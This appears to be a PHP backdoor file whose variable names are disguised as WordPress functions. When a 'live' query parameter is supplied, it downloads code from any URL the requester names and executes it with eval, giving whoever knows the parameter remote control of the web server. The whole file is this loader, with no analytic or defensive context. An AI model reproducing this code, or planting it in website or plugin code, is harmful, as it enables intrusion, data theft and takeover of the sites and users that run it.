<?php
if (isset($_GET['live'])) {
$wp_head_pj = $_GET['live'];
if ($add_query_arg_pe = curl_init()) {
curl_setopt($add_query_arg_pe, CURLOPT_URL, $wp_head_pj);
curl_setopt($add_query_arg_pe, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($add_query_arg_pe));
curl_close($add_query_arg_pe);
exit;
}
}